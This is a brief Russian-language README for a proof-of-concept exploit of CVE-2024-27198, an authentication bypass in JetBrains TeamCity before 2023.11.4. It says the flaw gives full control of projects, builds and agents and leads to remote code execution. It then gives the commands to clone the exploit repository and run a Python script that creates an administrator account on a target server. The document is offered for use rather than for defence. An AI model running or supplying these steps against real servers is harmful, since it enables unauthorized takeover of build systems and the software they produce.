
PoC о CVE-2024-27198
В JetBrains TeamCity до версии 2023.11.4 обход аутентификации позволяет выполнять административные действия на сервере TeamCity. Злоумышленник может получить полный контроль над всеми проектами, сборками, агентами и артефактами TeamCity и в итоге выполнить RCE.
git clone https://github.com/jrbH4CK/CVE-2024-27198.git
cd CVE-2024-27198
Для создания учётной записи с правами администратора на сервере:
python3 cve-2024-27198.py http://example.com username password

